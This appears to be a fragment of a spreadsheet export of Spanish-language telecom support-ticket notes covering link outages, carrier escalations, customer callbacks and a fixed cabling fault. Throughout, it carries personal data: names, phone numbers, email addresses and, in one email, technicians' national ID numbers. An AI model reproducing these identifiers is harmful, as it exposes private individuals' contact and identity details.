NOMBRE: A: 47701253
NÚMERO: 011 50247670496
DURACIÓN: 0:00:43
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: +50247670496
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 10/06/2022 12:39:40
2001453675
COLA:
NOMBRE: A: 47701253
NÚMERO: 47701253
DURACIÓN: 0:00:37
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 47701253
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 10/06/2022 12:41:38</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A UFINET, A LA ESPERA DE LA RESPUESTA.
DE: CARLOS IVAN PALENCIA FLORES
ENVIADO: MARTES, 14 DE JUNIO DE 2022 16:15
PARA: NOC UFINET LATAM &lt;NOCLATAM@UFINET.COM&gt;; GRUPO SOPORTE N1 LATAM &lt;N1.LATAM@UFINET.COM&gt;
CC: FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: ENLACE UFINET : 625900076T
BUENA TARDE ESTIMADOS
SOLICITAMOS SU APOYO CON VALIDAR EQUIPOS Y CONEXIONES AL FORTINET DEL ENLACE CON ID:625900076T YA QUE SE REALIZARON PRUEBAS DE PRIMER NIVEL CON EL CLIENTE EN LÍNEA
DONDE SE LOGRA UBICAR UN EQUIPO RAISECON CON UNA ETIQUETA CLARO UFINET, CLIENTE CONFIRMA QUE NO HAY NINGÚN CABLE DEL RAISECON HACIA EL FORTINET. ASÍ MISMO EN EL FORTINET NO HAY CABLE CONECTADO EN EL PUERTO LAN 3.
CLIENTE: CC_CAMPERO_GT_C692
ID UFINET: 625900076T
DIRECCIÓN: 692, KM. 116 CARRETERA INTERAMERICANA CENTRO COMERCIAL METRO PLAZA JUTIAPA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.  SALUDOS.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE INFORMANDO SOBRE LA PRUEBAS REALIZADAS ASI MISMO SE COMPARTE HORARIOS Y CONTACTOS DEL PR. A LA ESPERA DE ALGUN AVANCE.
DE: CARLOS IVAN PALENCIA FLORES &lt;CARLOSI.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 16 DE JUNIO DE 2022 8:53
PARA: JULIAN A. VALENCIA HENAO &lt;JVALENCIAH@UFINET.COM&gt;; YBASTIDASJ@UFINET.COM &lt;YBASTIDASJ@UFINET.COM&gt;; LCRUZL@UFINET.COM &lt;LCRUZL@UFINET.COM&gt;; GRUPO SOPORTE N1 LATAM &lt;N1.LATAM@UFINET.COM&gt;; NOC UFINET LATAM &lt;NOCLATAM@UFINET.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;
ASUNTO: RV: TIK-174908-G0C9: ENLACE UFINET : 625900076T
BUEN DÍA ESTIMADOS
SE LLAMA AL PUNTO REMOTO, CLIENTE APOYA REVISANDO CONEXIONES, LOGRA UBICAR UN EQUIPO DE NOMBRE RAISECON CON ETIQUETA DE EQUIPO CLARO UFINET, CLIENTE COMENTA QUE NO OBSERVA ALGÚN CABLE QUE CONECTE HACIA EL FORTINET. POR LO QUE SE DESCARTA ALGÚN PROBLEMA DE ENERGÍA.
SE UBICAN CONTACTO Y HORARIO DEL PUNTO REMOTO.
*CONTACTO LOCAL: HENRY MUÑOZ / 30586153
*DIRECCIÓN DEL SITIO: 692, KM. 116 CARRETERA INTERAMERICANA CENTRO COMERCIAL METRO PLAZA JUTIAPA
*HORARIO DE ATENCIÓN: 6:00 AM 10:00 PM
FOTOGRAFÍA DEL EQUIPO: NO SE LOGRA PODER TENER FOTOGRAFÍAS YA QUE EL CONTACTO HENRY MUÑOZ ESTÁ EN CAMINO AL SITIO.
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE PROCEDE A LLAMAR A L NUMERO: 2317-3333 DE TURNO UFINET PARA AVANCES, ME INDICAN QUE ESTAN AL PENDIENTE DE RESPUESTA DE VER SI SE PROCEDERA A COORDINAR VISITA, CUALQUER INFORMACION SE ENVIARA VIA CORREO.
3001522255
COLA:
NOMBRE: A: 23173333
NÚMERO: 011 50223173333
DURACIÓN: 0:24:33
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: +50223173333
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 16/06/2022 10:48:09</t>
  </si>
  <si>
    <t>SE LLAMA A HENRY MUÑOZ QUIEN INDICA QUE EN ESTOS MOMENTOS NO PUEDE APOYAR, POR LO QUE SOLICITA QUE SE LLAME NUEVAMENTE A LAS 15:30
3001804664
COLA:
NOMBRE: A: 30586153
NÚMERO: 011 50230586153
DURACIÓN: 0:01:17
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: +50230586153
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 17/06/2022 13:52:24</t>
  </si>
  <si>
    <t>SE HABLA CON UFINET CONFIRMAN QUE YA VEN OPERATIVO EL SERVICIO, SIN EMBARGO SEGUN LO INDICADO POR CLIENTE INDICA QUE AL CABO DE 1 HORA EL PUERTO SE APAGA, POR LO QUE SE SOLICITA A PERSONAL DE UFINET A CARGO DEL TT 175933 MANTENER EL SERVICIO EN MONITOREO POR 48 HORAS ANTE CUALQUIER EVENTUALIDAD IR A VALIDAR CON CLIENTE YA QUE PUEDE SER QUE EL CABLE TENGA DAÑO O EL PUERTO DEL EQUIPO RAISCOM ESTE DAÑADO
ID
RESULTADO: LLAMADA HECHA
NOMBRE: GUATEMALA
NÚMERO: 011 50230586153
INICIO: HOY, 16:08
FIN: HOY, 16:09
DURACIÓN: 0:09
ID DE LLAMADA: 3001843155</t>
  </si>
  <si>
    <t>SE HABLA CON HENRY MUÑOZ, INFORMA QUE TIENE EL CABLDE DE RED DEL RAISECOM CONECTADO EN EL PUERTO DE ARRIBA (SNMP), SIN EMBARGO SE DEBE TENER EL EL PUERTO DE ABAJO (LAN) POR LO QUE SE TRASLADA DE UBICACION EL CABLE DE RED Y SE CONECTA AL PUERTO CORRECTO LAN, CON LO QUE LOGRA RESTABLECER EL TUNEL EN EL MONITOREO
RMT_HQ_UFI	WAN P/_/625900076T/_/
10.243.1.39 / 255.255.255.0	UP	UP	2.39	0.00
ID
RESULTADO: LLAMADA HECHA
NOMBRE: 30586153
NÚMERO: 011 50230586153
INICIO: HOY, 15:39
FIN: HOY, 15:49
DURACIÓN: 9:44
ID DE LLAMADA: 3001835325</t>
  </si>
  <si>
    <t>SE LLAMA AL NUMERO 78446903, SIN RESPUESTA
ID
1001325932
COLA:
NOMBRE: A: 78446903
NÚMERO: 78446903
DURACIÓN: 0:00:50
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 78446903
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 4/06/2022 15:09:24</t>
  </si>
  <si>
    <t>SE LLAMA DE NUEVO A TERCER NUMERO BRINDADO POR BYRON PERO NO SE LOGRA COMUNCIACION. NO CONTESSTA 78446903 Y 43422771 PERTENECE A OTRO RESTAURANTE.
ID
1001835459
COLA:
NOMBRE: A: 52380655
NÚMERO: 52380655
DURACIÓN: 0:00:08
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:NÚMERO SIN ASIGNAR (CÓDIGO 01 DE CAUSA ISDN)/404:SIP - NO SE ENCUENTRA]
DETALLES: 52380655
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 7/06/2022 15:36:35</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE AL NUMERO 78446903, SIN RESPUESTA
ID
1001834832
COLA:
NOMBRE: A: 78446903
NÚMERO: 78446903
DURACIÓN: 0:00:50
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 78446903
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 7/06/2022 15:35:54</t>
  </si>
  <si>
    <t>SE INTENTA A OTRO NUMERO BRINDADO POR BYRON PERO NO SE LOGRA COMUNCIACION
ID
1001641818
COLA:
NOMBRE: A: 52380655
NÚMERO: 52380655
DURACIÓN: 0:00:10
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:NÚMERO SIN ASIGNAR (CÓDIGO 01 DE CAUSA ISDN)/404:SIP - NO SE ENCUENTRA]
DETALLES: 52380655
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 6/06/2022 16:58:09</t>
  </si>
  <si>
    <t>SE LLAMA A BYRON RUIZ YA QUE NO SE LOGRA COMUNICACION A LOS NUMEROS BRINDADOS ANTERIORMENTE EN CRONO, BRINDA OTRO NUMERO , 52380655 ISMAR
ID
1001640717
COLA:
NOMBRE: A: 47701253
NÚMERO: 47701253
DURACIÓN: 0:03:03
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 47701253
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 6/06/2022 16:56:42</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE AL NUMERO 78446903, SIN RESPUESTA
ID
1001640059
COLA:
NOMBRE: A: 78446903
NÚMERO: 78446903
DURACIÓN: 0:00:52
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 78446903
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 6/06/2022 16:51:38</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: JUEVES, 2 DE JUNIO DE 2022 20:51PARA: HELPDESK04@CAMPERO.COM &lt;HELPDESK04@CAMPERO.COM&gt;; HELPDESK02@CAMPERO.COM &lt;HELPDESK02@CAMPERO.COM&gt;; HELPDESK@CAMPERO.COM &lt;HELPDESK@CAMPERO.COM&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_CAMPERO_GT_C6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8231
ID: 625900076T
IDENTIFICADOR DEL CLIENTE:  CC_CAMPERO_GT_C692
UBICADO EN:  692, KM. 116 CARRETERA INTERAMERICANA CENTRO COMERCIAL METRO PLAZA JUTIAPA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>BYRON RUIZ CONTESTA LLAMADA SE LE INDICA QUE UN ENLACE DE CAMPERO SE ENCUENTRA CAIDO, PROPORCIONA TELEFONO 7844 6903,  SE LLAMA PERO NO HAY RESPUESTA.
1001167660
COLA:
NOMBRE: A: 47701253
NÚMERO: 47701253
DURACIÓN: 0:06:10
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 47701253
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 3/06/2022 16:43:04
1001170842
COLA:
NOMBRE: A: 78446903
NÚMERO: 78446903
DURACIÓN: 0:00:48
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 78446903
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 3/06/2022 16:51:29
1001175047
COLA:
NOMBRE: A: 78446903
NÚMERO: 78446903
DURACIÓN: 0:00:41
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 78446903
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 3/06/2022 17:07:42</t>
  </si>
  <si>
    <t>SE LLAMA A CONTACTO UBICADO EN TICKETS ANTERIORES  BYRON RUIZ EN DOS OCASIONES PERO NO SE TIENE RESPUESTA
1001148111
COLA:
NOMBRE: A: GUATEMALA
NÚMERO: 011 50247672837
DURACIÓN: 0:00:06
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA/404:SIP - NO SE ENCUENTRA]
DETALLES: +50247672837
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 3/06/2022 15:28:50
1001147659
COLA:
NOMBRE: A: 47701253
NÚMERO: 011 50247672837
DURACIÓN: 0:00:39
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: +50247672837
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 3/06/2022 15:29:03</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A NOC.ALIMENTOS@SOMOSCMI.COM
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: JUEVES, 9 DE JUNIO DE 2022 15:08PARA: NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; HELPDESK04@CAMPERO.COM &lt;HELPDESK04@CAMPERO.COM&gt;; HELPDESK@CAMPERO.COM &lt;HELPDESK@CAMPERO.COM&gt;; HELPDESK02@CAMPERO.COM &lt;HELPDESK02@CAMPERO.COM&gt;ASUNTO: RE: ENLACE ALARMADO PARA CLIENTE "CC_CAMPERO_GT_C692"
++
DE: JUAN RODRIGUEZ CRISTOBALENVIADO: JUEVES, 2 DE JUNIO DE 2022 20:51PARA: HELPDESK04@CAMPERO.COM &lt;HELPDESK04@CAMPERO.COM&gt;; HELPDESK02@CAMPERO.COM &lt;HELPDESK02@CAMPERO.COM&gt;; HELPDESK@CAMPERO.COM &lt;HELPDESK@CAMPERO.COM&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_CAMPERO_GT_C6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8231
ID: 625900076T
IDENTIFICADOR DEL CLIENTE:  CC_CAMPERO_GT_C692
UBICADO EN:  692, KM. 116 CARRETERA INTERAMERICANA CENTRO COMERCIAL METRO PLAZA JUTIAPA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMA A BYRON RUIZ, SE LE INDICA QUE NO HAY RESPUESTA DE LOS 3 CONTACTOS BRINDADOS, REALIZA PRUEBA DE LLAMAR TAMPOCO LE CONTESTAN, BRINDAR CORREO SOLICITA SE ENVIE REPORTE DEL INCIDENTE A NOC.ALIMENTOS@SOMOSCMI.COM.
2001262105
COLA:
NOMBRE: A: 47701253
NÚMERO: 47701253
DURACIÓN: 0:07:19
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 47701253
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 9/06/2022 14:53:03</t>
  </si>
  <si>
    <t>F4588259</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENRIQUE BRAN AL 42125839  INDICA QUE POR EL MOMENTO ESTA ESTABLE PERO SI HA ESTADO INTERMITENTE SOLICITA QUE SE MANTENGA EN OBSERVACION 24 HRS TAMBIEN INDICA QUE CUANDO LLEGARON A INSTALAR DEJARON UNA ESPECIE DE PUENTE PERO NO DEJARON LOS CONECTORES QUE ERAN LE INDICARON A CLIENTE QUE HIBAN A REALIZAR EL CAMBIO Y AUN NO LO HAN HECHO SOLICITA QUE SE REALIZE ESE CAMBIO DE CONECTORES **
ID 1001006592
**</t>
  </si>
  <si>
    <t>SE VALIDA QUE YA HAY CONFIRMACIÓN DE PARTE DEL CL EL SERVICIO OPERATIVO POR LO QUE NO CORRESPONDE EL ESTADO, SE NOTIFICA AL GESTOR RAMOS.MARLON VÍA SKYPE</t>
  </si>
  <si>
    <t>F4588297</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTA EL SEÑOR EMILIO AGUILAR CONFIRMA SERVICIO ESTABLE INDICA QUE FUE POR FALLA DE ENERGIA **
ID 1001006250
**</t>
  </si>
  <si>
    <t>F4588379</t>
  </si>
  <si>
    <t>SE HABLÓ CON RAÚL HERNÁNDEZ/CLIENTE 00 525551745299 ME COMUNICA CON JULIO GONZÁLEZ/CLIENTE INDICA, ÉSTE ME DEJA DEMASIADO TIEMPO EN ESPERA; SE CONSULTA A GESTIÓN N1 VÍA SKYPE CÓMO VEN COMPORTAMIENTO DEL SERVICIO.</t>
  </si>
  <si>
    <t>SE HABLÓ CON GILBERTO ROMANO/CLIENTE 00 525551745299 INDICA QUE AÚN NO TIENEN RESPUESTA DE CLIENTE FINAL, PIDE SE LE LLAME HASTA EL DÍA LUNES A LAS 08:00AM PARA SEGUIMIENTO Y/O VALIDAR SERVICIO.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5299 MENCIONA QUE ESTARA RESPONDIENDO EL CORREO
-ID 1001168021</t>
  </si>
  <si>
    <t>SE HABLÓ CON GUADALUPE SÁNCHEZ/CLIENTE 00 525551745299 INDICA QUE SU CLIENTE FINAL ESTÁ HACIENDO PRUEBAS, PIDE SE LE LLAME A LAS 12:00PM PARA SEGUIMIENTO.</t>
  </si>
  <si>
    <t>IMDHE020572 ***--- SE LLAMA A TELMEX 52 55 5174 5299 ATIENDE EMILIO CASTAÑEDA   (CLIENTE)  Y SOLICITA SE DEJE EN MONITOREO A LAS 08:00 DE HOY   ---***
3001999394</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5299 CONTESTA LA SEÑORITA GUADALUPE SANCHEZ E INDICA QUE NO HAN CONFIRMARDO CON CLIENTE FINAL QUE CUANDO CONFIRMEN ELLOS NOS ESTARAN RESPONDIENDO VIA CORREO **
-ID 1001007884
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5299 MENCIONA QUE AUN ESTAN A LA ESPERA DE RESPUESTA POR PARTE DE CLIENTE FINA
-ID 1001560978</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5299 DEJAN EN ESPERA Y NO RETOMAN LA LLAMADA
-ID 1001087569</t>
  </si>
  <si>
    <t>F4588487</t>
  </si>
  <si>
    <t>SEGUN LO EXPUESTO EN CRONOS:
CLIENTE LLAMARA CUANDO SE ENCUENTRE ALGUIEN DEL PERSONAL DE ELLOS EN SITIO YA QUE QUIEREN VALIDAR SI LA IMPRESORA ES LA QUE ESTA TENIENDO INCONVENIENTES CON EL SERVICIO, SEGUN CC CLIENTE LLAMARA APARTIR DE LAS 8 AM...--- SERVICIO POR PARTE DE CLARO SE ENCUENTRA RESTABLECIDO</t>
  </si>
  <si>
    <t>SE LLAMÓ DOS VECES A CLIENTE 50002641 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE. HAY CORREO SEGUIMIENTO:
ASUNTO: RE: PROBLEMAS NAVEGACIÓN 310322</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
RE: PROBLEMAS NAVEGACIÓN 310322</t>
  </si>
  <si>
    <t>F4588516</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MAYNOR LARIOS 66209720 EXT 871084 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001145984</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA VALIDAR EL FUNCIONAMIENTO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 3 DE JUNIO DE 2022 14:23
PARA: LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; MAYNOR LARIOS &lt;MAYNORLARIOS@ICASA.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
CC: TELECOMUNICACIONES VPC &lt;TELECOMVPC@ICASA.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE SUPER24 FRAIJANES 2 ID: 86100079 , DOWN
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MAYNOR LARIOS 66209720 EXT 871084 QUIEN SOLICITA UN MOMENTO EN LINEA Y LUEGO CORTA LA LLAMADA
-ID 1001128433</t>
  </si>
  <si>
    <t>F4588573</t>
  </si>
  <si>
    <t>TECNICOS FUSIONANDO FIBRA OPTICA</t>
  </si>
  <si>
    <t>TABLA DE ESCALAMIENTO METRO PLANTA EXTERNA ORIENTE 				
	WO OPEN                        			7:56
1/4	ALVARO CAMPOS 	58261563	2 HORAS	9:56:00
2/4	ALVARO CAMPOS 	58261563	3 HORAS	10:56:00
3/4	RENE AGUSTIN	58261183	5 HORAS	12:56:00
4/4	RODOLFO MORALES	58261609	6 HORAS	13:56:00</t>
  </si>
  <si>
    <t>JORGE LUIS PACHECO QUEDA A LA ORDEN DE ASIGNAR A MILTON LOPEZ QUIEN LLEGARA PARA LA REEPARACION DE MEDIO GPON TIEMPO ESTIMADO DE LLEGADA 13:20 HRS</t>
  </si>
  <si>
    <t>F4588578</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE IVAN CRUZ 56939178, SE LE INDICA QUE PBX NO ESTÁ ENVIANDO REGISTRO Y SE LE SOLICITA REINICIAR SU PLANTA PBX. CLIENTE INDICA QUE NO SE ENCUENTRA DONDE ESTÁN SUS EQUIPOS, SOLICITA SE LE LLAME EN 15 MINUTOS EN LO QUE LLEGA. ID: 1001007357</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  IVAN CRUZ 56939178 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001021003</t>
  </si>
  <si>
    <t>CLIENTE IVAN CRUZ 56939178 INDICA QUE YA REINICIÓ SU PLANTA PBX PERO SE OBSERVA QUE AUN NO SE REGISTRA EN CENTRAL, CLIENTE ESTÁ VERIFICANDO SU EQUIPO. SOLICITA SE LE LLAME EN 5 MINUTUTOS.  ID: 1001012540</t>
  </si>
  <si>
    <t>F4588598</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE  LIC RODRIGUEZ 79306947	##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON MIGUEL BARRERA 25917059
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE NOS COMUNICA CON RENE MARAVILLA  QUIEN INDICA QUE EL CONTRATO CON CLARO TERMINO EL 31 MAYO DEL PRESENTE AÑO, INDICA QUE OFICINAS CENTRALES Y EL MINSAL ESTAN MIGRANDO SUS SERVICIOS TANTO DE NUMEROS DE FIJOS Y TAMBIEN COMO EL SERVICIO DE E1 A TIGO, INDICA QUE YA ESTAN EN ESE TRASLADO Y QUE HABIAN INDICADO AL ASESOR DE VENTAS LA FINALIZACION CON CLARO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE UBICANDO EQUIPOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4588619</t>
  </si>
  <si>
    <t>**SE LLAMA CLIENTE HUGO ESCICH AL 2521 0500 EXT. 521 NO RESPONDE || SE INTENTARA LUEGO **
ID 1001694385
**</t>
  </si>
  <si>
    <t>HUGO ESCICH 25210500 EXT. 521 NO AUTORIZO REALIZAR LA DECONEXIONDE SU LAN, SE REALIZARA PRUEBAS EN VENTANA DE MANTENIMIENTO, SOLICITA QUE SE REALICE LA VISITA TECNICA PARA EL DIA DOMINGO ...</t>
  </si>
  <si>
    <t>**SE LLMA A CLIENTE HUGO ESCICH 25210500 EXT. 521 NO RESPONDE || SE INTENTARA LUEGO **
ID  1001774265 - 1001774498
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HUGO ESCICH 25210500 EXT. 521 MENCIONA QUE YA TIENE AUTORIZADOS LOS PERMISOS PARA EL DIA LUENES A LAS 6:30 HRS
-ID 1001065772</t>
  </si>
  <si>
    <t>HUGO ESCICH 25210500 EXT. 521 CAMBIA LA FECHA, SOLICITA LA VISITA PARA EL DIA LUNES 6 A LAS 6:30 AM. SOLITA ENVIAR LOS DATOS AL CORREO HESCRICH@IOM.INT</t>
  </si>
  <si>
    <t>SE PLATICA CON CLIENTE HUBO, POR LO CUAL SER COORDINAR CON PERSONAL DE CAMPO PARA REALIZAR UNA VISITA EL DIA DE MAÑANA, TAMBIEN SE LE SOLICITA A CLIENTE LAS IP DE LOS SERVIDORES A LA CUAL SE LE TIENE INCONVENIENTES
1001587673
COLA:
NOMBRE: A: 0050325210500
NÚMERO: 0050325210500
DURACIÓN: 0:12:58
ESTADO: CONECTADA
DETALLES: 0050325210500
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 6/06/2022 14:13:14</t>
  </si>
  <si>
    <t>DR LLAMA A CLIENTE HUGO ESCICH 25210500 EXT. 521 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001047852</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HUGO ESCICH 25210500 EXT. 521 SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001028828</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE, A LA ESPERA QUE BRINDE DATOS DE IP EL CUALES TIENE INCONVENIENTE
DE: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 6 DE JUNIO DE 2022 14:55
PARA: BRENDA MARISOL DE PAZ PEREZ &lt;BRENDA.DEPAZ@CLARO.COM.GT&gt;; ESCRICH HUGO &lt;HESCRICH@IOM.INT&gt;; JONATHAN EDUARDO TEZEN MEJIA &lt;JONATHAN.TEZENM@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; ORELLANA JORGE &lt;JORELLANA@IOM.INT&gt;; MARTINEZ KRISHNA &lt;KMARTINEZ@IOM.INT&gt;
ASUNTO: RE: GESTION DE ACCESOS F4588619 | OIM ORGANIZACION INTERNACIONAL PARA LAS MIGRACIONES | ID1026238SV | ANTIGUO CUSCATLANURB. CUMBRES DE MADRE SELVA II5PASAJE H
BUENA TARDE
ESTIMADO CLIENTE HUGO DANDO SEGUIMIENTO AL INCIDENTE REPORTADO Y DE ACUERDO A LO CONVERSADO POR LLAMADA, SOLICITO DE SU APOYO EN GESTIONAR PERMISOS PARA PERSONAL TÉCNICO Y REALIZAR LA VISITA EL DÍA DE MAÑANA A LAS 6:30 AM,  TAMBIÉN SOLICITAMOS DE SU APOYO EN BRINDAR IP DE LO SERVIDORES AL CUAL SE TIENE INCONVENIENTES ESTO CON EL FIN DE PODER VERIFICAR EL INCONVENIENTE.
DUI                 CODIGO        EMPLEADO
00936126-7   4799              MARIO ERNESTO CRUZ MARQUEZ
00354722-1   4378              RONAL MOREL CRESPIN
00157708-4    4690             ABRAHAM SAMUEL PEREZ
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HUGO ESCICH 25210500 EXT. 521 NO RESPONDE || OPERADORA INDICA QUE TODOS LOS OPERADORES ESTAN OCUPADOS,  SE INTENTARA LUEGO**
-ID 1001904087
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HUGO ESCICH 25210500 EXT. 521 SIGUE SIN RESPONDER, SE INTENTARA LUEGO
-ID 1001838676 - 1001839004</t>
  </si>
  <si>
    <t>**SE LLAMA CLIENTE HUGO ESCICH AL 2521 0500 EXT. 521 NO RESPONDE ||  SE INTENTARA LUEGO **
